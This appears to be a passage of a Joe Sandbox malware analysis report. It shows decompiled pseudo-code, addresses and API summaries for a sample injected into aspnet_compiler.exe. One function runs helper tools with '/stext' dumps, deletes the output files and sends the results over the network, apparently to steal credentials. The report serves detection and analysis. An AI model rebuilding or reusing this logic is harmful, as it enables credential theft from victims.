                    0x0044f155
                    0x00000000
                    0x0044f15a
                    0x0044ef2b
                    0x0044ef34
                    0x0044eefe
                    0x00000000
                    0x0044eefe
                    0x0044eef9
                    0x00000000
                    0x0044eef9
                    0x0044eed4
                    0x00000000
                    0x0044eea9
                    0x0044eea9
                    0x0044eeab
                    0x0044eeae
                    0x0044f1ef
                    0x0044f1ef
                    0x0044f1f7
                    0x0044f1f9
                    0x0044f1f9
                    0x0044f201
                    0x0044f206
                    0x0044f20a
                    0x0044f212
                    0x0044f21a
                    0x0044f220
                    0x0044f20a
                    0x0044f224
                    0x0044f229
                    0x0044f22f
                    0x00000000
                    0x0044f22f

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 81053f9c94f3d198c50d80b60ac2f365dac252c2faa5b35674da0a71a95d3b8d
                    • Instruction ID: f43520f85eab2823aefddca190de3c75bdb19f5807818d4f337798dcfd7c07fb
                    • Opcode Fuzzy Hash: 81053f9c94f3d198c50d80b60ac2f365dac252c2faa5b35674da0a71a95d3b8d
                    • Instruction Fuzzy Hash: 18C14476E40205AFEB20DBA9CC42FEF77F8AB18704F14416AFA04FB286D6749D458764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00411FF7 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E00411FF7() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t165;
				void* _t168;
				void* _t174;
				void* _t180;
				void* _t186;
				void* _t192;
				void* _t198;
				void* _t212;
				void* _t217;
				void* _t222;
				void* _t223;
				void* _t254;
				void* _t255;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				char _t298;
				intOrPtr _t300;
				void* _t474;
				void* _t494;
				void* _t500;
				void* _t504;
				void* _t505;
				void* _t506;
				void* _t507;
				intOrPtr _t519;

				GetModuleFileNameW(0, _t505 + 0x178, 0x104);
				E004020BF(_t291, _t505 + 0xf8);
				E004020BF(_t291, _t505 + 0xe0);
				E004020BF(_t291, _t505 + 0xc8);
				_t494 = Sleep;
				_t504 = 0;
				do {
					 *((char*)(_t505 + 0x1b)) = 0;
					 *((char*)(_t505 + 0x19)) = 0;
					 *((char*)(_t505 + 0x1a)) = 0;
					E0040CEEC(_t505 + 0xb4, 0x30, E00401F8B(E0041A4D3(_t505 + 0x1c)));
					E00401FB8();
					E0040CEEC(_t505 + 0x9c, 0x30, E00401F8B(E0041A4D3(_t505 + 0x1c)));
					E00401FB8();
					_t165 = E00401F8B(E0041A4D3(_t505 + 0x1c));
					_t459 = 0x30;
					E0040CEEC(_t505 + 0x84, 0x30, _t165);
					E00401FB8();
					_t292 = 0;
					while(1) {
						_t168 = E00401F8B(_t505 + 0x3c8);
						_t174 = E00401EE4(E00402FF4(_t292, _t505 + 0x20, E004042FD(_t292, _t505 + 0x58, E004042DC(_t292, _t505 + 0x74, _t505 + 0x194, _t504, 0, E0040415E(_t292, _t505 + 0x38, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0xb4), _t494, _t504, 0, "\""));
						_t459 = _t168;
						 *((char*)(_t505 + 0x16)) = E00417456(_t174);
						E00401EE9();
						E00401EE9();
						E00401EE9();
						E00401EE9();
						if( *((char*)(_t505 + 0x16)) != 0) {
							break;
						}
						Sleep(0xa);
						_t292 = _t292 + 1;
						if(_t292 < 0xa) {
							continue;
						}
						break;
					}
					_t293 = 0;
					while(1) {
						_t180 = E00401F8B(_t505 + 0x3f8);
						_t186 = E00401EE4(E00402FF4(_t293, _t505 + 0x3c, E004042FD(_t293, _t505 + 0x70, E004042DC(_t293, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040415E(_t293, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x9c), _t494, _t504, 0, "\""));
						_t459 = _t180;
						 *((char*)(_t505 + 0x18)) = E00417456(_t186);
						E00401EE9();
						E00401EE9();
						E00401EE9();
						E00401EE9();
						if( *((char*)(_t505 + 0x18)) != 0) {
							break;
						}
						Sleep(0xa);
						_t293 = _t293 + 1;
						if(_t293 < 0xa) {
							continue;
						}
						break;
					}
					_t294 = 0;
					while(1) {
						_t192 = E00401F8B(_t505 + 0x3e0);
						_t198 = E00401EE4(E00402FF4(_t294, _t505 + 0x3c, E004042FD(_t294, _t505 + 0x70, E004042DC(_t294, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040415E(_t294, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x84), _t494, _t504, 0, "\""));
						_t459 = _t192;
						 *((char*)(_t505 + 0x17)) = E00417456(_t198);
						E00401EE9();
						E00401EE9();
						E00401EE9();
						E00401EE9();
						if( *((char*)(_t505 + 0x17)) != 0) {
							break;
						}
						Sleep(0xa);
						_t294 = _t294 + 1;
						if(_t294 < 0xa) {
							continue;
						}
						break;
					}
					_t519 =  *((intOrPtr*)(_t505 + 0x16));
					_t60 = (0 | _t519 == 0x00000000) + 1; // 0x1
					_t62 = ( !=  ? _t519 == 0 : _t60) + 1; // 0x2
					_t296 =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
					_t500 = 0;
					 *((intOrPtr*)(_t505 + 0x34)) =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
					while(1) {
						E00401EE4(_t505 + 0xb0);
						if(E0041ADFE(_t505 + 0xf8) != 0) {
							DeleteFileW(E00401EE4(_t505 + 0xb0));
						}
						E00401EE4(_t505 + 0x80);
						if(E0041ADFE(_t505 + 0xe0) == 0) {
							_t298 =  *((intOrPtr*)(_t505 + 0x19));
						} else {
							_t298 = 1;
							 *((char*)(_t505 + 0x19)) = 1;
							DeleteFileW(E00401EE4(_t505 + 0x80));
						}
						E00401EE4(_t505 + 0x98);
						_t471 = _t505 + 0xc8;
						if(E0041ADFE(_t505 + 0xc8) != 0) {
							 *((char*)(_t505 + 0x1a)) = 1;
							DeleteFileW(E00401EE4(_t505 + 0x98));
						}
						if(_t298 != 0 && _t298 != 0 &&  *((char*)(_t505 + 0x1a)) != 0) {
							break;
						}
						Sleep(0x1f4);
						_t500 = _t500 + 1;
						if(_t500 < 0xa) {
							continue;
						}
						break;
					}
					_t212 = E0040619C();
					_t300 =  *((intOrPtr*)(_t505 + 0x34));
					if(_t212 == 0 || E0040619C() == 0 || E0040619C() == 0) {
						E00401EE9();
						E00401EE9();
						E00401EE9();
					} else {
						goto L25;
					}
					L28:
					E0040AE7E(_t300, _t505 + 0x118, _t471, _t494, _t504, 0x2710, 0);
					_t217 = E00401EE4(_t505 + 0x110);
					_t506 = _t505 - 0x18;
					E004020D6(_t300, _t506, _t471, _t533, _t506 + 0x428);
					E00412770(_t506 + 0x50, _t217, _t217, _t504);
					_t507 = _t506 + 0x18;
					E00401EE9();
					_t222 = E00405AE5("0");
					_t474 = _t507 + 0x110;
					_t534 = _t222;
					if(_t222 == 0) {
						_t223 = E0041A879(_t300, _t507 + 0x1c, _t474);
						E00402E81(_t508, E00402EF0(_t300, _t508 + 0x190, E00402EF0(_t300, _t508 + 0x17c, E00402EF0(_t300, _t508 + 0x168, E00402EF0(_t300, _t508 + 0x154, E00402EF0(_t300, _t508 + 0x68, E00402EF0(_t300, _t508 + 0x9c, E00402F11(_t507 - 0x18 + 0x68, _t507 - 0x18 + 0x3c8, _t504, 0x472ec8), _t504, __eflags, _t508 + 0x128), _t504, __eflags, 0x472ec8), _t504, __eflags, _t508 + 0x108), _t504, __eflags, 0x472ec8), _t504, __eflags, _t508 + 0xe8), _t504, __eflags, 0x472ec8), _t223);
						_push(0x6a);
						E00404A81(0x473388, _t233, __eflags);
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
					} else {
						_t254 = E0041A879(_t300, _t507 + 0x170, _t474);
						_t508 = _t507 - 0x18;
						_t255 = E0041A6E9(_t300, _t507 - 0x18 + 0x170, _t300);
						E00402E81(_t508, E00402EF0(_t300, _t508 + 0x58, E00402E81(_t508 + 0x8c, E00402EF0(_t300, _t508 + 0x78, E00402EF0(_t300, _t508 + 0x48, E00402EF0(_t300, _t508 + 0xe0, E00402EF0(_t300, _t508 + 0xcc, E00402EF0(_t300, _t508 + 0xb8, E00402EF0(_t300, _t508 + 0x164, E00402F11(_t508 + 0x180, _t508 + 0x3f0, _t504, 0x472ec8), _t504, _t534, _t508 + 0x130), _t504, _t534, 0x472ec8), _t504, _t534, _t508 + 0x110), _t504, _t534, 0x472ec8), _t504, _t534, _t508 + 0xf0), _t504, _t534, 0x472ec8), _t255), _t504, _t534, 0x472ec8), _t254);
						_push(0x69);
						E00404A81(0x473388, _t267, _t534);
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
					}
					E00401FB8();
					E00401EE9();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					return E00401FB8();
					L25:
					Sleep(0x64);
					E00401EE9();
					E00401EE9();
					E00401EE9();
					_t504 = _t504 + 1;
					_t533 = _t504 - 0xa;
				} while (_t504 < 0xa);
				goto L28;
			}


































                    0x00412010
                    0x0041201d
                    0x00412029
                    0x00412035
                    0x0041203a
                    0x00412040
                    0x00412042
                    0x00412046
                    0x0041204b
                    0x00412050
                    0x0041206b
                    0x00412075
                    0x00412094
                    0x0041209e
                    0x004120ae
                    0x004120b4
                    0x004120bd
                    0x004120c7
                    0x004120cc
                    0x004120ce
                    0x004120d5
                    0x00412123
                    0x00412128
                    0x00412135
                    0x00412139
                    0x00412142
                    0x0041214b
                    0x00412154
                    0x0041215e
                    0x00000000
                    0x00000000
                    0x00412162
                    0x00412164
                    0x00412168
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00412168
                    0x0041216e
                    0x00412170
                    0x00412177
                    0x004121c5
                    0x004121ca
                    0x004121d7
                    0x004121db
                    0x004121e4
                    0x004121ed
                    0x004121f6
                    0x00412200
                    0x00000000
                    0x00000000
                    0x00412204
                    0x00412206
                    0x0041220a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041220a
                    0x00412210
                    0x00412212
                    0x00412219
                    0x00412267
                    0x0041226c
                    0x00412279
                    0x0041227d
                    0x00412286
                    0x0041228f
                    0x00412298
                    0x004122a2
                    0x00000000
                    0x00000000
                    0x004122a6
                    0x004122a8
                    0x004122ac
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004122ac
                    0x004122b4
                    0x004122c0
                    0x004122cb
                    0x004122ce
                    0x004122d1
                    0x004122d3
                    0x004122db
                    0x004122e2
                    0x004122f7
                    0x00412308
                    0x00412308
                    0x00412315
                    0x0041232a
                    0x00412347
                    0x0041232c
                    0x0041232c
                    0x00412335
                    0x0041233f
                    0x0041233f
                    0x00412352
                    0x00412357
                    0x00412367
                    0x00412370
                    0x0041237b
                    0x0041237b
                    0x00412383
                    0x00000000
                    0x00000000
                    0x00412395
                    0x00412397
                    0x0041239b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041239b
                    0x004123a8
                    0x004123ad
                    0x004123b3
                    0x00412410
                    0x0041241c
                    0x00412428
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041242d
                    0x0041243b
                    0x00412447
                    0x0041244c
                    0x0041245b
                    0x00412466
                    0x0041246b
                    0x00412472
                    0x00412483
                    0x00412488
                    0x0041248f
                    0x00412491
                    0x004125ef
                    0x00412687
                    0x0041268d
                    0x00412694
                    0x004126a0
                    0x004126ac
                    0x004126b8
                    0x004126c4
                    0x004126cd
                    0x004126d6
                    0x004126df
                    0x00412497
                    0x0041249e
                    0x004124a3
                    0x004124b8
                    0x00412561
                    0x00412567
                    0x0041256e
                    0x00412577
                    0x00412580
                    0x00412589
                    0x00412592
                    0x0041259e
                    0x004125aa
                    0x004125b6
                    0x004125c2
                    0x004125ce
                    0x004125da
                    0x004125df
                    0x004126e8
                    0x004126f4
                    0x00412700
                    0x0041270c
                    0x00412718
                    0x00412724
                    0x00412730
                    0x0041273c
                    0x00412748
                    0x00412754
                    0x0041276f
                    0x004123d5
                    0x004123d7
                    0x004123e0
                    0x004123ec
                    0x004123f8
                    0x004123fd
                    0x004123fe
                    0x004123fe
                    0x00000000

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412010
                      • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                      • Part of subcall function 00417456: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00463E44), ref: 0041746C
                      • Part of subcall function 00417456: CloseHandle.KERNEL32(D>F,?,?,004040D5,00463E44), ref: 00417475
                    • Sleep.KERNEL32(0000000A,00463E44), ref: 00412162
                    • Sleep.KERNEL32(0000000A,00463E44,00463E44), ref: 00412204
                    • Sleep.KERNEL32(0000000A,00463E44,00463E44,00463E44), ref: 004122A6
                    • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 00412308
                    • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 0041233F
                    • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 0041237B
                    • Sleep.KERNEL32(000001F4,00463E44,00463E44,00463E44), ref: 00412395
                    • Sleep.KERNEL32(00000064), ref: 004123D7
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                    • String ID: /stext "
                    • API String ID: 1223786279-3856184850
                    • Opcode ID: 089e6abb93f4f8d39ae8831357fffea25337ca4732c3d5964ef3bf405c68efd5
                    • Instruction ID: fc4ad0b7eed9c60d5fc35351bb25392cbbf70f9ec0b82e477513c0ff0abfdd60
                    • Opcode Fuzzy Hash: 089e6abb93f4f8d39ae8831357fffea25337ca4732c3d5964ef3bf405c68efd5
                    • Instruction Fuzzy Hash: A70246315083414AC328FB61D891AEFB3D5AFD4348F50493FF48A931E2EF789A49C65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004544DC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 41%
                    			E004544DC(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0045423F(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E0044EB75(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E004541AA();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0044EABE(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x470810 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E00453F5D(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x470810 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E004541AA();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x470810 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E0043EE77(GetLastError());
											 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0044EC87( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E004543BB(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0044A5EC(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E0043EE77(_t270);
							 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E0043EEAD())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x470810 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0043EE77(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E004541AA();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0043EE9A()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E0043EEAD())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0043EE9A()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E0043EEAD()));
				}
			}





















































                    0x004544ff
                    0x00454503
                    0x00454504
                    0x00454504
                    0x00454504
                    0x00454506
                    0x0045450c
                    0x00454527
                    0x0045452c
                    0x0045452f
                    0x00454531
                    0x00454533
                    0x00454552
                    0x00454559
                    0x00454560
                    0x00454563
                    0x0045456f
                    0x00454572
                    0x0045457a
                    0x0045457b
                    0x0045457e
                    0x0045457e
                    0x00454585
                    0x00454587
                    0x0045458a
                    0x00454592
                    0x00454595
                    0x00454602
                    0x00454603
                    0x00454609
                    0x0045460b
                    0x00454654
                    0x00454657
                    0x00454660
                    0x00454663
                    0x00454666
                    0x00454668
                    0x00454668
                    0x00454668
                    0x00454659
                    0x0045465c
                    0x0045465c
                    0x0045466d
                    0x00454670
                    0x0045467c
                    0x00454681
                    0x0045468d
                    0x00454697
                    0x0045469b
                    0x004546a5
                    0x004546a8
                    0x004546b3
                    0x004546b8
                    0x004546c8
                    0x004546cb
                    0x004546cf
                    0x004546d0
                    0x004546d6
                    0x004546db
                    0x004546de
                    0x004546e0
                    0x004546e2
                    0x004546e7
                    0x004546ea
                    0x004546ec
                    0x00454716
                    0x0045473a
                    0x0045473e
                    0x00454742
                    0x00454744
                    0x00454748
                    0x0045474a
                    0x00454754
                    0x00454757
                    0x0045475e
                    0x0045475e
                    0x0045475e
                    0x0045475e
                    0x00454748
                    0x00454763
                    0x0045476f
                    0x00454771
                    0x004547fc
                    0x004547fc
                    0x00000000
                    0x00454777
                    0x00454777
                    0x0045477b
                    0x00000000
                    0x00000000
                    0x00454780
                    0x00454792
                    0x0045479a
                    0x0045479d
                    0x0045479e
                    0x004547a1
                    0x004547a8
                    0x004547ad
                    0x004547b0
                    0x004547e4
                    0x004547ee
                    0x004547ee
                    0x004547f8
                    0x00000000
                    0x004547f8
                    0x004547b9
                    0x004547d2
                    0x004547d9
                    0x004545fc
                    0x00000000
                    0x004545fc
                    0x00454771
                    0x004546ee
                    0x00000000
                    0x004546ba
                    0x004546c1
                    0x004546c4
                    0x004546c6
                    0x004546f0
                    0x004546f2
                    0x00000000
                    0x004546f8
                    0x00000000
                    0x004546c6
                    0x004546b8
                    0x00454613
                    0x00454616
                    0x00454631
                    0x00454636
                    0x0045463c
                    0x0045463e
                    0x00454649
                    0x00454649
                    0x00000000
                    0x0045463e
                    0x00454597
                    0x0045459e
                    0x004545a0
                    0x004545d7
                    0x004545d7
                    0x004545e1
                    0x004545e4
                    0x004545eb
                    0x004545eb
                    0x004545eb
                    0x004545f7
                    0x00000000
                    0x004545f7
                    0x004545a2
                    0x004545a6
                    0x00000000
                    0x00000000
                    0x004545a8
                    0x004545b7
                    0x004545bc
                    0x004545bf
                    0x004545c0
                    0x004545c3
                    0x004545c3
                    0x004545ca
                    0x004545cc
                    0x004545cf
                    0x004545d2
                    0x004545d5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00454535
                    0x0045453a
                    0x0045453d
                    0x00454544
                    0x00000000
                    0x00454544
                    0x0045450e
                    0x00454513
                    0x00454519
                    0x0045451b
                    0x00000000
                    0x00454520

                    APIs
                      • Part of subcall function 004541AA: CreateFileW.KERNEL32(00000000,00000000,?,00454585,?,?,00000000,?,00454585,00000000,0000000C), ref: 004541C7
                    • GetLastError.KERNEL32 ref: 004545F0
                    • __dosmaperr.LIBCMT ref: 004545F7
                    • GetFileType.KERNEL32(00000000), ref: 00454603
                    • GetLastError.KERNEL32 ref: 0045460D
                    • __dosmaperr.LIBCMT ref: 00454616
                    • CloseHandle.KERNEL32(00000000), ref: 00454636
                    • CloseHandle.KERNEL32(?), ref: 00454780
                    • GetLastError.KERNEL32 ref: 004547B2
                    • __dosmaperr.LIBCMT ref: 004547B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: fdd6ef0341d715ca66b4f226cea273408d1dce2abc93341c621d467a1a4981a0
                    • Instruction ID: e7023db14128a88f38c155e4c92a359c255939900931c8e81202aef98a64c706
                    • Opcode Fuzzy Hash: fdd6ef0341d715ca66b4f226cea273408d1dce2abc93341c621d467a1a4981a0
                    • Instruction Fuzzy Hash: 49A148319141089FDF199F68DC517AE3BA0AF4A329F14015EFC11DF392D7388856CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00413EF7 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                    Download Yara Rule
                    C-Code - Quality: 38%
                    			E00413EF7(char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
				intOrPtr _v0;
				short _v4;
				char _v8;
				char* _v12;
				signed short _v20;
				intOrPtr _v24;
				char _t36;
				short _t37;
				intOrPtr* _t44;
				void* _t47;
				void* _t49;
				char* _t52;
				signed short* _t58;
				signed char _t63;
				intOrPtr _t64;
				signed short _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t77 =  &_v12;
				_t36 =  *((intOrPtr*)("65535")); // 0x33353536
				_v8 = _t36;
				_t37 =  *0x46a5f0; // 0x35
				_t74 = _a4;
				_v4 = _t37;
				_v12 =  &_v8;
				if(_t74 == 0 || _a8 < 0x10) {
					L42:
					return 0x2afb;
				} else {
					_t71 = 2;
					if( *_t74 != _t71) {
						return 0x273f;
					}
					_t76 = _a24;
					_t64 = _a20;
					_t73 = _a16;
					if(_a12 == 0 || _t73 == 0) {
						if(_t64 == 0 || _t76 == 0) {
							return 0x2af9;
						} else {
							goto L8;
						}
					} else {
						L8:
						_t63 = _a28;
						_t42 = _t63 & 0x00000006;
						if((_t63 & 0x00000006) != 6) {
							if(_t64 == 0 || _t76 == 0) {
								L21:
								if(_a12 == 0 || _t73 == 0) {
									L40:
									return 0;
								} else {
									_t44 =  *((intOrPtr*)(_t74 + 4));
									_a4 = _t44;
									if((_t63 & 0x00000002) == 0) {
										_t44 =  &_a4;
										__imp__#51(_t44, 4, _t71);
										if(_t44 == 0) {
											L30:
											if((_t63 & 0x00000004) == 0) {
												_push(_v8);
												L37:
												__imp__#12();
												_t75 = _t44;
												L38:
												if(_t73 <= E00439290(_t75)) {
													goto L42;
												}
												E0044030E(_v4, _t73, _t75);
												goto L40;
											}
											__imp__#111();
											_t47 = _t44 - 0x2af9;
											if(_t47 == 0) {
												L34:
												return 0x2af9;
											}
											_t49 = _t47 - 1;
											if(_t49 == 0) {
												return 0x2afa;
											}
											if(_t49 == 1) {
												goto L42;
											}
											goto L34;
										}
										_t75 =  *_t44;
										if( *_t44 == 0) {
											goto L30;
										}
										if((_t63 & 0x00000001) != 0) {
											_t52 = L00413895(_t75, 0x2e);
											if(_t52 != 0) {
												 *_t52 = 0;
											}
										}
										goto L38;
									}
									_push(_t44);
									goto L37;
								}
							} else {
